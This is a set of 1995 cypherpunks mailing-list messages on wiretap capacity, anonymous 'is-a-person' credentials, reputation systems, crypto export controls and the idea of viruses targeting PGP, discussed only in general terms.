receiving the ad money) when consuming (viewing or otherwise) the ads.

All its other flaws seem to based on the same sort of identity denial 
problem. Damn!

Any protocols, cryptographic or otherwise?

TIA




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moroni <moroni@scranton.com>
Date: Wed, 22 Nov 1995 18:09:39 +0800
To: Peter Wayner <pcw@access.digex.net>
Subject: Re: Are there enough FBI agents to handle Digital Telephony?????
In-Reply-To: <v02130512acd7941208f9@[199.125.128.5]>
Message-ID: <Pine.LNX.3.91.951121134201.2872A-100000@prufrocks.scranton.com>
MIME-Version: 1.0
Content-Type: text/plain


    There is and probably never will be a shortage of people to carry on 
wire tapping . The term agent could be all encompassing in the future to 
include but not be limited to the hiring of ex-federally employed 
personnel with the talents or capacity for the talent to do wiretapping. 
In other words there are any number of ex-CIA ,DEA, ex-military who if 
were hired would actually save the government investigation time and 
costs because they have allready gone through security clearance. Add to 
that the fact that most if not all FBI personnel have gone through a 
light wiretap course to famililarize them with the rudiments of the craft.
   All these figures add up to cover the taps in case a disaster of the 
terroristic kind should happen. I feel that numbers are there to worry 
people but that what the FBI is worrying about is whether it can cover 
large ground if there is a siege like state in this country.HOWEVER, 
there will allways be those that opportunistically take advantage of 
circumstances to set up their own invisible little feifdoms along the 
political and social terrain. 
   If you ask me if there is something for them to worry about I have to 
in all good conscience say yes , if you ask if there is something for us 
to worry about again I have to say yes. I don't know if there is even a 
common ground for both sides to work towards because terrorism has grown 
to include the homegrown variety .
 
                     Deirdre




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Scheidt <david@math.earlham.edu>
Date: Wed, 22 Nov 1995 03:56:32 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: Proving I'm not Bob.
In-Reply-To: <Pine.3.89.9511211301.B20512-0100000@tesla.cc.uottawa.ca>
Message-ID: <Pine.NXT.3.91.951121142858.1144A-100000@litoria>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 21 Nov 1995 s1113645@tesla.cc.uottawa.ca wrote:

> I had an idea for an advertising based net-payment scheme that has 
> a particular security flaw making it totally untrustworthy unless it is
> possible to prove that you are not a particular person (the publisher 
> receiving the ad money) when consuming (viewing or otherwise) the ads.

What is this system?  I can't think of any system that wouldn't work if 
rearranged so that instead of proving you aren't Bob, you simply don't 
prove that you are.  It is true that they are not isomorphic, and that 
could be a problem in some situations, but I don't see this as one of them.

david
--------
David_Scheidt@math.earlham.edu

yip yip yip yap yap yak yap yip *BANG*  -- no terrier






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 22 Nov 1995 07:07:41 +0800
To: cypherpunks@toad.com
Subject: Re: Proving I'm not Bob.
In-Reply-To: <Pine.3.89.9511211301.B20512-0100000@tesla.cc.uottawa.ca>
Message-ID: <199511212233.OAA16781@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


s1113645@tesla.cc.uottawa.ca writes:

>I had an idea for an advertising based net-payment scheme that has 
>a particular security flaw making it totally untrustworthy unless it is
>possible to prove that you are not a particular person (the publisher 
>receiving the ad money) when consuming (viewing or otherwise) the ads.

BTW, we had some interesting postings here last year from Jason Solinsky
(solman@mit.edu) about schemes involving advertising and payment, where
people would get paid to view advertisements.  Is this the kind of thing
you're thinking of?

I posted some ideas once on how to prove that you are not someone else.
Any such scheme has to be grounded in a physical mechanism to determine that
two people are different.  For example, you might be able to get some
special cryptographic signature or credential from an agency by showing
some biometric information, such as retina or thumb prints.  You wouldn't
necessarily have to reveal your name, identity, or any other information;
just something which would allow the agency to be sure that they had not
given such a credential out to you before.

If you didn't care about privacy, your problem could then be solved
simply by having each person exhibit his credential (these are often
called "is-a-person" credentials).  The more interesting question then
becomes exhibiting that credential in a privacy protecting way, but
still being able to tell if two people are showing the same or
different credentials.

There are various ways of doing this; one of the simplest would be for
the agency to give you a blind signature using a particular exponent,
where you would be allowed exactly one of each exponent.  You unblind
these, and to show you aren't Bob both you and Bob show your signatures
for some matching exponent, which will be different.  Because of the
blinding, no one will link the credential to your identifying
information, and because it is a signature from the agency, no one can
forge a credential different from the one they have.

Depending on the situation and your tradeoffs between convenience and
privacy, you might discard used credentials (for maximum privacy), or
you might reuse them in a particular forum where you have persistent
identity (for maximum convenience).  In the latter case, the exponent
used could be associated with the forum, which is the idea behind
Chaum's pseudonym system.

Hal Finney
hfinney@shell.portal.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ethridge@Onramp.NET (Allen B. Ethridge)
Date: Wed, 22 Nov 1995 05:06:13 +0800
To: cypherpunks@toad.com
Subject: Re: Are there enough FBI agents to handle Digital Telephony?????
Message-ID: <v02130500acd7e7228be6@[199.1.154.51]>
MIME-Version: 1.0
Content-Type: text/plain


In addition to the large quantity they want, they also want to be able to
deliver the conversation from a mobile suspect to mobile agents who are
following the suspect.  So even if you use a digital set with "voice
privacy" activated that government car behind you might still be listening
to you.

The FBI's "requirements" present an entertaining set of logistical
problems.  Simply equipping the switches to handle the extra capacity,
especially during busy hour, is problematic.

        allen






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair"  (Time Keeper) <fair@clock.org>
Date: Wed, 22 Nov 1995 07:24:04 +0800
To: cypherpunks@toad.com
Subject: "The Right To Privacy" by Caroline Kennedy, et. al.
Message-ID: <v02110118acd807aa64e2@[198.68.110.3]>
MIME-Version: 1.0
Content-Type: text/plain


In an EPIC Alert on 10:46 10/23/95, Dave Banisar wrote:

>"The Right to Privacy," November 9.  Authors Caroline Kennedy and Ellen
>Alderman discuss their new book on privacy.  Lizner Auditorium, George
>Washington University, Washington, DC.  Contact 202/357-3030.

Did anyone here go to this event, or has read the book yet? There is a
review of it in TIME magazine at this URL:

http://pathfinder.com/@@iEPVLuF5EgMAQChZ/time/magazine/domestic/1995/951106/
publishing.html

thanks,

Erik Fair






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <dreschs@mpd.tandem.com>
Date: Wed, 22 Nov 1995 05:56:01 +0800
To: cypherpunks@toad.com
Subject: Re: "Junk E-Mail"
In-Reply-To: <199511211647.RAA15185@utopia.hacktic.nl>
Message-ID: <199511212111.PAA12087@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


nobody@REPLAY.COM (Anonymous) said:

A> Sten wrote:
>> They (as in, the government) has used the RICO laws against Operation
>> Rescue, an anti-abortion/pro-life (pick your term) group for
>> protesting/picketing abortion clinics and doctors who perform
>> abortions.

A>       And for successfully encouraging the murder of doctors.

	Sorry, but the RICO case had nothing to do with any of the
murders.  And if you're gonna go after OR&company for encouraging the
murder of doctors, I hope you're also going after certain rappers for
encouraging the murder of police.

>> If they had prosecuted under statutes which applied to everyone, I
>> wouldn't have had a problem, but they are going after OR and similar
>> organizations for using tactics similar to those used by civil rights
>> protesters in the 60s.

A>       Who were systematically arrested, beaten, teargassed,
A> wiretapped, and even occasionally shot at. I *know*--I got firehosed,
A> beaten, arrested, and wiretapped for what I did. That's why I'm a
A> Cypherpunk now.  OR has received far better treatment than the civil
A> rights protesters ever did--or did I miss the news items reporting
A> that Terry Randall and Ralph Reed had been assassinated, and that
A> their lieutenants had been bumped off in black-bag jobs, and that
A> their colleagues were chained down to chairs *in court*?

	And the treatment you received then was wrong.  Does that make
admittedly less violent treatment of OR&company right?  At risk of your
calling it a 'nursery rhyme', or something similarly trivializing, two
wrongs don't make a right.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 22 Nov 1995 07:59:27 +0800
To: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Subject: Re: Virus attacks on PGP
Message-ID: <199511212326.PAA06093@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  8:34 11/21/95 -0500, SINCLAIR  DOUGLAS N wrote:
>> Certainly having PGP run from a CDROM or other read-only device would be a
>> big help.  Even better would be to have all the privileged code also run
>> from a read-only device.
>
>Seeing as PGP is quite small the simplest and cheapest read-only device
>would be a write-protected floppy disk.

But do remember that your copy of PGP could be infected as it is loaded
from the disk.  You really need to protect your privileged code too.

Bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 22 Nov 1995 08:09:13 +0800
To: cypherpunks@toad.com
Subject: Re: towards a theory of reputation
In-Reply-To: <Pine.SUN.3.91.951121130450.19018A-100000@eskimo.com>
Message-ID: <199511212332.PAA24563@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Wei Dai <weidai@eskimo.com> writes:

>The first step toward a theory of reputation is defining what reputation 
>is.  The definition should correspond closely enough to our common sense
>notion of reputation so that our intuitions about it are not completely 
>useless.  I think a good definition is this: Alice's reputation of Bob is 
>her expectation of the results of future interactions with Bob.  If 
>these interactions are mainly economic in nature, then we can represent 
>Alice's reputation of Bob by a graph with the horizontal axis labeled 
>price and the vertical axis labeled expected utility.  A point (x,y) on 
>the graph means that Alice expects to get y utils in a business transaction 
>where she pays Bob x dollars.  Given this definition, it is natural to say 
>the Bob's reputation is the set of all other people's reputations of Bob.

This is an interesting approach.  However this seems to fold in issues of
reliability with issues of quality and value.  If I have a choice of two
vendors, one of whom produces a product which is twice as good, but there
is a 50% chance that he will abscond with my money, I am not sure how to
value him compared with the other.  It seems like the thrust of the
analysis later is to determine whether people will in fact try to
disappear.  But that is not well captured IMO by an analysis which just
ranks people in terms of "utility" for the price.

>A reputation system consists of a set of entities, each of whom has a 
>reputation and a method by which he changes his reputation of others.  
>I believe the most important question for a theory of reputation to answer 
>is what is a good method (reputation algorithm) by which a person changes 
>his reputation of others.  A good reputation algorithm must serve his 
>self-interest; it must not be (too) costly to evaluate; its results must 
>be stable; a reputation system where most people use the algorithm must 
>be stable (i.e., the reputation system must be an evolutionarily stable 
>system).

I am not sure about this last point.  It seems to me that a good
reputation is one which is most cost-effective for its owner.  Whether it
is good for social stability is not relevant to the person who is
deciding whether to use it.  ("But what if everyone behaved that way?
How would you feel then?")  It may be nice for the analyst but not for
the participant.

>In a reputation based market, each entity's reputation has three values.  
>First is the present value of expected future profits, given the reputation 
>(let's call it the operating value).  Note that the entity's reputation 
>allows him to make positive economic profits, because it makes him a 
>price-maker to some extent.  Second is the profit he could make if he 
>threw away his reputation by cheating all of his customers (throw-away 
>value).  Third is the expected cost of recreating an equivalent reputation 
>if he threw away his current one (replacement cost).

I don't really know what the first one means.  There are a lot of
different ways I can behave, which will have impact on my reputation, but
also on my productivity, income, etc.  There are other ways I can damage
my reputation than by cheating, too.  I can be sloppy or careless or just
not work very hard.  So the first two are really part of a continuum of
various strategies I may apply in life.  The second is pretty clear but
the first seems to cover too wide a range to give it a value.

>Now it is clear that if a reputation's throw-away value ever exceeds its 
>operating value or replacement cost, its owner will, in self-interest, 
>throw away his reputation by cheating his customers.  In a stable reputation 
>system, this should happen very infrequently.  This property may be 
>difficult to achieve, however, because only the reputation's owner knows 
>what its values are, and they may fluctuate widely.  For example the 
>operating value may suddenly decrease when his competitor announces
>a major price cut, or the replacement cost may suddenly decrease when 
>he succeeds subverting a respected reputation agency.

It would be useful to make some of the assumptions a bit clearer here.
Is this a system in which cheating is unpunishable other than by loss of
reputation, our classic anonymous marketplace?  Even if so, there may be
other considerations.  For example, cheating may have costs, such as
timing the various frauds so that people don't find out and extricate
themselves from vulnerable situations before they can get stung.  Also,
as has been suggested here in the past, people may structure their
interactions so that vulnerabilities to cheating are minimized, reducing
the possible profits from that strategy.

>One way to answer some of these questions may be to create a model of 
>a reputation system with a simple reputation algorithm and a simplified 
>market, and determine by analysis or simulation whether it has the 
>desirable properties.  I hope someone who has an economist friend can 
>persuade him to do this.

It might be interesting to do something similar to Axelrod's Evolution
of Cooperation, where (human-written) programs played the Prisoner's
Dilemma against each other.  In that game, programs had reputations in
a sense, in that each program when it interacted with another
remembered all their previous interactions, and chose its behavior
accordingly.  The PD is such a cut-throat game that it apparently
didn't prove useful to try to create an elaborate reputation-updating
model (at least in the first tournaments; I understand that in later
versions some programs with slightly non-trivial complexity did well).

What you might want to do, for simplicity, is to have your universe
consist of just one good (or service, or whatever), with some producers
who all have the same ability, and some consumers, all with the same
needs.  Where they differ would be in their strategies for when to
cheat, when to be honest, when to trust, and when to be careful.

At any given time a consumer must choose which producer to buy from.
The details of their interaction would appear to greatly influence the
importance of reputation.  Maybe there could be a tradeoff where if the
consumer is willing to pay in advance he gets a better price than if he
will only provide cash on delivery.  (Unfortunately it seems like the
details of this tradeoff will basically determine the outcome of the
experiment.  However maybe some values will lead to interesting
behavior.)  Producers who want to cheat could do so by offering greater
discounts for payment in advance, offering low prices in order to
attract as many customers as possible before disappearing.  Consumers
might rightly be suspicious of an offer that looks too good.

Maybe it could be set up so consumers could cheat, too.  No, I think that
is too complicated.  Then producers would have to know consumers'
reputations and I think it gets muddy.  Probably it would be simplest to
just have producers have reputations.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ahupp@primenet.com (Adam Hupp)
Date: Wed, 22 Nov 1995 05:45:53 +0800
To: ylo@cs.hut.fi
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <199511212106.OAA22450@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Tue, 21 Nov 1995 02:10:02 +0100
>From: Tatu Ylonen <ylo@cs.hut.fi>
>To: ahupp@primenet.com
>Cc: cypherpunks@toad.com
>Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
>
>> PKZIP allows encryption (other's ?).  How about a hook to that?
>
>PKZIP "encryption" is self-deception.  A program for cracking it,
>PKCRACK, is widely available on the internet.  See e.g.
>ftp.funet.fi:/pub/crypt/analysis.  
>
>[For information about internationally available cryptographic
>software, see http://www.cs.hut.fi/crypto.]
>
>    Tatu Ylonen <ylo@cs.hut.fi>

PKCRACK uses a dictionary attack. Anyway, my point was that you could use
PKZIP's encryption as an excuse for passing a password.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 22 Nov 1995 06:53:16 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Proving I'm not Bob.
In-Reply-To: <Pine.NXT.3.91.951121142858.1144A-100000@litoria>
Message-ID: <199511212210.RAA11334@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


s1113645@tesla.cc.uottawa.ca writes:
> I had an idea for an advertising based net-payment scheme that has 
> a particular security flaw making it totally untrustworthy unless it is
> possible to prove that you are not a particular person (the publisher 
> receiving the ad money) when consuming (viewing or otherwise) the ads.

david writes:
> What is this system?  I can't think of any system that wouldn't work if 
> rearranged so that instead of proving you aren't Bob, you simply don't 
> prove that you are.  It is true that they are not isomorphic, and that 
> could be a problem in some situations, but I don't see this as one of them.

I don't know what particular scheme s1113645 has in mind. But as you point
out, not proving P is very different from proving not-P. Generally, a scheme
that charges for advertising based upon the measured number of accesses to
the advertising has the kind of authentication problem mentioned above. The
party paying for the advertising only wants to pay to reach "legitimate" 
customers. A dishonest publisher (selling ad space) could access the
advertising many times herself to artificially inflate the access figures,
justifying higher advertising charges. 

To avoid paying for this "illegitimate" traffic, the advertiser would like to
authenticate the accesses as *not* coming from the untrusted publisher. This
is a hard problem in general, because the advertiser really wants to discount 
accesses by the publisher, her agents, her family, her friends, etc. It's
tough to prove that you're not working for someone else at a formal protocol
level.

(Note that widespread "legitimate" anonymous accesses of material can
severely damage the reliability of these kinds of measurement-based payment
schemes.)

I think this thread is rapidly straying from cpunks relevance....

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Wed, 22 Nov 1995 08:02:02 +0800
To: cypherpunks@toad.com
Subject: The Congressional Mailbot
Message-ID: <199511212318.QAA26412@mailhost1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Here's your chance to protest ITAR and 
whatever other CPUNK thing you feel worthwile.
Enjoy!


CONGRESSIONAL MAILBOT SERVICE

This service is provided to make it easy for you to get your message to
all members of the House or Senate that have E-Mail mailboxes.  By sending
a single message to the service addressed at HOUSE@MAILBOT.COM and/or
SENATE@MAILBOT.COM, your single message will be expanded and resent to all
members of those specified houses as if YOU had E-Mailed each and everyone
of them yourself.

Any E-Mail responses to your inquiries will be sent directly back to your
own E-Mail box.

WHERE DO I SEND MY E-MAIL TO MAKE THIS HAPPEN?

In order to use this service, you need to address your E-Mail to one or
both of the addresses listed below.

FOR MEMBERS OF TU          House@Mailbot.com
FOR MEMBERS OF THE US SENATE:
         Senate@Mailbot.com

WHO WILL RECEIVE THIS E-MAIL?

Your incoming message is sent to all currently known members of congress
that have E-Mail mailboxes.  The Congressional Mailbot System updates it's
list of members of both the Houses every 30 days.  At that time, new email
addresses are added to the Mailbot Server.


WHAT TO INCLUDE IN YOUR MESSAGE?

Most members of congress do not have the staff to deal with replies via
both regular mail and E-Mail.  Most would prefer to reply to your specific
request by way of regular postal mail.  In order for them to do that, you
need to include your NAME, ADDRESS, CITY & STATE so that they can send you
a response.


WHAT NOT TO INCLUDE IN YOUR MESSAGE?

Basically, your message should be short and to the point.  It is not wise
to include large amounts of text from other sources.  If you want to point
out to them about such sources, simply tell them where you saw it.
Imagine getting hundreds of email messages containing the same material
over and over.  The meaning gets lost.  Make your message clear and easy
to read.

WARNING

Each member of the House or Senate which receives a message from you via
the Mailbot, will respond with a reply message.

           THIS CAN GENERATE A LOT OF EMAIL INTO YOUR MAILBOX.

If for example, at the time you send your request to the Mailbot, there
are 130 members of the specific house you select, you will get back 130
reply messages from those members when they receive your message.
Currently, the automatic replies are about 750 bytes in size and only
contain a header with no message body.

These replies are sent to let you know that the Congress Person you sent
the message to, has received it in their E-Mailbox.

Some users use systems that only allow so much email per month for free
and then charge for email sent/received after that!


IF YOU CANNOT HAVE THIS AMOUNT OF TRAFFIC IN YOUR MAILBOX
PLEASE DO NOT USE THIS SERVICE!


WHAT IF I WANT TO SEND A MESSAGE TO A SPECIFIC Congress Persons?

THEN YOU SHOULD NOT USE THIS SERVICE!  This service is for E-Mail intended
for ALL members of the House and/or Senate.  Individual messages to
specific Congress Persons should be sent by other means.


LIMITATIONS:

This is a very popular tool....  Several rules need to be enforced to
ensure that this service does not overburden the systems that are
connected to it.  The following rules are in place...

    1 The Mailbot will reject any message that is larger than 5,000 bytes
in size.  This provides you with a total of 66 lines of 80 columns per
line for your message which is a whole page of information to make your
point.

    2 Please limit usage of the mailbot to no more than one message per 72
hour period (one each to HOUSE and SENATE is ok).

    3 Abusive and obscene messages violate the purpose and spirit of this
service and WILL place the originator of such messages on a rejection
list.

Users who cannot abide by the above limitations will be placed permanently
on a rejection list and all further attempts to use the service will
result that user's messages being rejected by the service.

PROBLEMS OR QUESTIONS?

If you have any problems or questions about this service, please direct
them to the following E-Mail address:  Mailbot@Mailbot.Com

TELL A FRIEND?

If you should tell a friend or colleague about this service, PLEASE
INCLUDE THIS MESSAGE.  This will save them time in knowing what is
permitted and will keep questions about the service down to a minimum.


This Service is Provided By:
                       MAILBOT SERVICES OF ARIZONA
                       (c) 1995 Mailbot Services of Arizona.
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Lull <lull@acm.org>
Date: Wed, 22 Nov 1995 02:17:43 +0800
To: SINCLAIR DOUGLAS N <sinclai@ecf.toronto.edu>
Subject: Re: Virus attacks on PGP
In-Reply-To: <95Nov21.083447edt.10061@cannon.ecf.toronto.edu>
Message-ID: <199511211743.JAA06639@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 21 Nov 1995 08:34:46 -0500, you wrote:

> Seeing as PGP is quite small the simplest and cheapest read-only device
> would be a write-protected floppy disk.
> 
> Could a virus write to a write-protected disk?  I'm not sure if the
> protection is done in the BIOS or the drive hardware.

In the drive hardware.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 22 Nov 1995 01:53:58 +0800
To: cypherpunks@toad.com
Subject: Re: "Junk E-Mail"
Message-ID: <199511211647.RAA15185@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Sten wrote:

>        They (as in, the government) has used the RICO laws against
>Operation Rescue, an anti-abortion/pro-life (pick your term) group for
>protesting/picketing abortion clinics and doctors who perform abortions.

      And for successfully encouraging the murder of doctors. 

>If they had prosecuted under statutes which applied to everyone, I
>wouldn't have had a problem, but they are going after OR and similar
>organizations for using tactics similar to those used by civil rights
>protesters in the 60s.

      Who were systematically arrested, beaten, teargassed, wiretapped,
and even occasionally shot at. I *know*--I got firehosed, beaten,
arrested, and wiretapped for what I did. That's why I'm a Cypherpunk now.
      OR has received far better treatment than the civil rights
protesters ever did--or did I miss the news items reporting that Terry
Randall and Ralph Reed had been assassinated, and that their lieutenants
had been bumped off in black-bag jobs, and that their colleagues were
chained down to chairs *in court*?

>                       'Course, civil rights is Politically Correct.
>Abortion rights is Politically Correct.  Protesting abortion is
>Politically Incorrect, therefore illegal.

      Do you usually send nursery rhymes to mailing lists?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 23 Nov 1995 09:43:43 +0800
To: cypherpunks@toad.com
Subject: Re: Spam the Sign!
In-Reply-To: <199511210121.RAA02291@goblin.punk.net>
Message-ID: <30B28651.57A@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


sameer wrote:
> 
> >
> > And as far as needing government approval, I noticed that Sameer has an
> > export controlled ftp server at c2.org.  Maybe he could tell us what is
> > necessary to setup such an animal.
> >
> > --
> 
>         I do what RSADSI does with ftp.rsa.com. It requires a cronjob
> and sed. I didn't get the NSA to approve it, but I figure if it's good
> enough for RSADSI it's good enough for me.

  Do you have a legal opinion to support this statement?  Our lawyers
tell us that executives of netscape could go to jail if we make the
128bit version of netscape available from an "export controlled"
ftp or http server.  We are working to clarify the situation with
the government or figure out an alternative distribution scheme that
will remove us from the grey area.

  Getting the US version of netscape widely available is one of my
highest priorities, but I can't tell Barksdale that he should go to
jail over it.  I'm constantly pushing from within the company to keep
things moving forward.

  In the mean time I appologize to the linux users who can't even
buy the 128 bit version.  If something changes on this front I'll
be sure to let people know.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 22 Nov 1995 11:10:00 +0800
To: cypherpunks@toad.com
Subject: Re: Export control FTP servers
In-Reply-To: <9511210441.AA26515@sulphur.osf.org>
Message-ID: <30B28957.4C06@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


I thought that they had not yet released their official policy.  Last
time I heard they were still refusing to put anything in writing saying
that your measures were "ok", pending release of their official policy.

  If John is indeed leaving, this will give the powers-that-be an
excuse to delay even longer.

	--Jeff

attila wrote:
> 
> well, since it is "official" policy and the basics concern rejecting all
> foreign addresses and making the proposed recipient agree to a file
> statement agreeing not to export and that he/she/it is an American or
> Canadian citizen, it might be nice if someone who has the `sed ....`
> and/or `awk...` scripts would post them for all to use (with whatever
> disclaimers, etc.)
> 
> On Mon, 20 Nov 1995, Rich Salz wrote:
> 
> > >     I do what RSADSI does with ftp.rsa.com. It requires a cronjob
> > >and sed. I didn't get the NSA to approve it, but I figure if it's good
> > >enough for RSADSI it's good enough for me.
> >
> > I believe some of the following has been posted here before.
> > The person to speak with is
> >       John Sonderman
> >       Office of Defense Trade
> >       Department of Compliance
> >       703 875 6644
> > He's supposed to be Internet-aware.   What's not common knowledge is
> > that he's leaving by early December for budgetary reasons.  If you're
> > thinking of putting export controlled stuff up for FTP, you should
> > probably contact John now.
> >       /r$
> >

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Whalley <ian@virusbtn.com>
Date: Wed, 22 Nov 1995 03:07:56 +0800
To: cypherpunks@toad.com
Subject: Re: Virus attacks on PGP
In-Reply-To: <199511211743.JAA06639@ix8.ix.netcom.com>
Message-ID: <199511211832.SAA12002@elbereth.sophos.com>
MIME-Version: 1.0
Content-Type: text/plain


>>Could a virus write to a write-protected disk?  I'm not sure if the
>>protection is done in the BIOS or the drive hardware.
>In the drive hardware.

In certain rare cases, drive hardware fails in such a way to allow
write access to write-protected diskettes - I have one such machine
here.  This appears to happen more often in 5.25" drives - perhaps
this is simply because most of the ones I come in contact with are
older than the 3.5" ones.

This is not a suitable viral attack, however, least of all against
a specific target like PGP.  However, viruses attacking specific
programs are well-known, both in concept and actuality - take
AntiEXE, which will corrupt certain sector reads if the sector
starts with a given byte pattern.  In a similar way it would be possible
to attack PGP, at least on DOS platforms.   However, it would be
dependent upon compiler used/version of PGP/etc etc, and only
work in a few cases.

More likely is something which waits to see when a certain program
is run (let's say PGP :-)), and records keystrokes (keyphrase,
anyone?).  Then it takes a copy of the secret key file along with
the keyphrase, and is able to do whatever it likes with them.

Slightly off-topic, for which I apologise, but there we go.

I.

---------------------------------------------------------------------
| Ian Whalley, Editor,   |    Phone/Fax : +44-1235-555139/531889    |
| Virus Bulletin,        |    DDI       : +44-1235-544039           |
| 21 The Quadrant,       |------------------------------------------|
| Abingdon Science Park, |    PGP key   :   2A 02 96 E5 5D 77 4C 8D |
| Oxon, OX14 3YS, UK.    |  fingerprint :   EB 22 14 6F E0 3B A0 D3 |
---------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 22 Nov 1995 08:10:49 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Interesting statement by Alameda County DA
Message-ID: <199511212334.SAA02295@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by iang@cory.EECS.Berkeley.EDU (Ian Goldberg) 
on Tue, 21 Nov  1:50 PM

>One of the speakers was Don Ingraham, Assistant 
>District Attorney,  Alameda County.  In responding to a 
>question from the audience, he said:
>
>"You're making a distinction between criminals and big 
>business.
>    That is not my experience."


   Assistant Devil's Angel Ingraham cites two out of three,
   the other is the omnipresent public safety racket -- his
   temp job in train to future peace by salubrious punishment
   of the other two overtense sinners.

   Often, a backlasher rep in one leads to a pretend-
   thrasher slot in the others. RICO, for instance, is an
   ingenious selective-caning law for flyswatting one
   conspirator by another but to not go so far as to bruise
   flesh and foreclose franchises for prosecutorial
   "shiatsu."

   This ancient soft-drubbing by one of the others is meant to
   conceal their common-origin ritual of corporeal writhings,
   manipulations, strokings, caresses and digitizers to debase
   from upright to bent to kneeling to prone succeeding down
   ladder, applying lubricants, linguants, unguents, balms, 
   dental whiteners and body hair to head, to rest six under.

   Criminal, financial, legal -- indistinguishable from any
   other mortality-salving levitationism.

   -- From The One Outback Truth.


>   "Hey, Ian _said_ it was noise."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Wed, 22 Nov 1995 08:42:52 +0800
To: David Scheidt <david@math.earlham.edu>
Subject: Re: Proving I'm not Bob.
In-Reply-To: <Pine.NXT.3.91.951121142858.1144A-100000@litoria>
Message-ID: <Pine.3.89.9511211956.A45492-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 21 Nov 1995, David Scheidt wrote:

> What is this system?  I can't think of any system that wouldn't work if 
> rearranged so that instead of proving you aren't Bob, you simply don't 
> prove that you are.  It is true that they are not isomorphic, and that 
> could be a problem in some situations, but I don't see this as one of them.

Hal and Futplex pretty much described it. I figured a proof of non-identity
(if possible) would have saved one hell of a lot of messy authentication
in those cases when there is only one possible cheater (due to economic 
incentives) with many possible pseudonyms (or friends).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 22 Nov 1995 12:03:28 +0800
To: Peter Wayner <pcw@access.digex.net>
Subject: Re: Are there enough FBI agents to handle Digital Telephony?????
In-Reply-To: <v02130512acd7941208f9@[199.125.128.5]>
Message-ID: <Pine.ULT.3.91.951121193502.5283A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Don't the numbers include all types of interceptions, both wiretaps and 
records of what number you call?

You also don't need to listen live. Recording media is cheap these days. 
Record all calls, put into a database keyed by time and number called, 
refer to it later.

-rich




